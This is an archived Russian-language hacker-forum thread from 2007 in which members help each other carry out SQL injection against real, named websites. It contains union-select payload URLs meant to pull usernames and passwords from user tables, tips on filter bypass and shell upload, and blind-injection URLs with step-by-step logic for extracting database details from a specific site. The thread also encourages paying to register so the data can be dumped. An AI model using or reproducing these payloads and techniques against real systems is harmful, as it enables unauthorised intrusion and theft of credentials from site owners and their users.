ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
18.10.2007, 16:13
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Такая ситуация: есть таблица юзеров форума - abc_user. Таблица находится в базе - abc-forum. Когда я пишу скулю
site.com/fname.php?id=-1+union+select+1,username,2+from+abc-forum.abc_user/*
выводиться такая ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.abc_user/*'
Проблема как я понимаю в тире в имени базы. Подскажите, что делать с этим тире?
|
|
|
18.10.2007, 16:19
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
У меня как-то фильтровалось нижнее подчеркивание и точка. Вышел из положения урл кодированием... незнаю как это понимать но факт был. Кодировал название таблицы в урл коды и запрос работал без этого нет.
|
|
|
|
18.10.2007, 16:24
|
|
Новичок
Регистрация: 27.09.2007
Сообщений: 11
Провел на форуме:
142777
Репутация:
4
|
|
Нашел инъекцию, не blind, только при следующем запросе http://www.motonews.ru/news.moto?id=-1+union+select+1,password,3,4,5+from+aprilia_april ia.user/*&catid=52
сообщение об ошибке пропадает и страница отображается без проблем. load_file вроде работает. Скорее всего, настроена фильтрация. Может попробовать шелл залить? Или пытаться обойти фильтр?
|
|
|
|
18.10.2007, 16:56
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
VentRu как там дела с magic quotes обстоят?
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
18.10.2007, 17:26
|
|
Новичок
Регистрация: 27.09.2007
Сообщений: 11
Провел на форуме:
142777
Репутация:
4
|
|
да вроде в on.
|
|
|
|
18.10.2007, 17:35
|
|
Новичок
Регистрация: 27.09.2007
Сообщений: 11
Провел на форуме:
142777
Репутация:
4
|
|
 Уже прикрыли. По крайней мере, ошибки синтаксиса уже нет. |
|
|
|
21.10.2007, 12:44
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
Подскажите,как добиться вывода инфы, нашел скулю юнион работает,принтабельных полей 3(подобрал ордером),а выводить не выводит!
Пример http://gbc.ge/index.php?kw=mcg&m=search&ncat=-23'+union+select+1,2,3/*&lang=rus
|
|
|
|
21.10.2007, 13:11
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от fobofob
Подскажите,как добиться вывода инфы, нашел скулю юнион работает,принтабельных полей 3(подобрал ордером),а выводить не выводит!
Пример http://gbc.ge/index.php?kw=mcg&m=search&ncat=-23'+union+select+1,2,3/*&lang=rus
1) Если ты уверен что какие то поля выводятся, то скорее всего ты не правильно подобрал кол-во колонок (или не правильно составил подзапрос). Так что вначале перепроверь как ты все сделал.
2) Версия мускула может быть 3 и тогда твой подзапрос будет бесполезен, с такой версией ты мало чего сделаешь.
3) Иногда вывод может быть виден в исходниках страницы (я про html, а не php), т.е. для просмотра идешь в Вид-Исходный текст (это в опере) и там находишь колонки которые вывелись. Да кстати если тебе нужно будет закрыть какой нидь тег, то прям так и дописываешь, к примеру: concat('</title>',выводимая в теге колонка) - тогда тут вывод будет уже не в тайтале, а на самой странице.
4) Если есть sql-инъекция то можешь попробывать посимвольный брут (+and+substring(version(),1,1)=5 и т.д.). Правда это займёт очень много времени.
|
|
|
|
21.10.2007, 14:25
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от fobofob
Подскажите,как добиться вывода инфы, нашел скулю юнион работает,принтабельных полей 3(подобрал ордером),а выводить не выводит!
Пример http://gbc.ge/index.php?kw=mcg&m=search&ncat=-23'+union+select+1,2,3/*&lang=rus
неувидел там инъекции... с чего ты взял, что она есть?
__________________
Карфаген должен быть разрушен...
|
|
|
|
22.10.2007, 03:35
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Сообщение от Scipio
неувидел там инъекции... с чего ты взял, что она есть?
Вообщем инъекция там есть, правда слепая =\
Для того чтобы была не слепая надо зарегаться на сайте, а это только за $ - поэтому тут надо выбирать либо на халяву но ппц как долго, либо заплатить 1$ и в течении часа все слить =)
Со слепой (если решишь все-таки продолжить) есть один нюанс - подзапросы с and не катят, поэтому надо через or - соответственно логика обратная, пример:
Код:
http://gbc.ge/index.php?kw=mcg&m=search&ncat=23'+or+(select+substring(version(),1,1)=5)/*&lang=rus
такой запрос выведет норм страницу - значит первая цифра версии не 5!
а вот такой запрос
Код:
http://gbc.ge/index.php?kw=mcg&m=search&ncat=23'+or+(select+substring(version(),1,1)=4)/*&lang=rus
выведет пустую страницу - значит первая цифра версии 4!
Вообщем я думаю логика понятна =)
Версия там 4.x.x.(MySQL)
дальше если есть желание перебором как написал Grey по именам таблиц, столбцов и т.д...
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?486973){kind=avatar}
Линейный вид
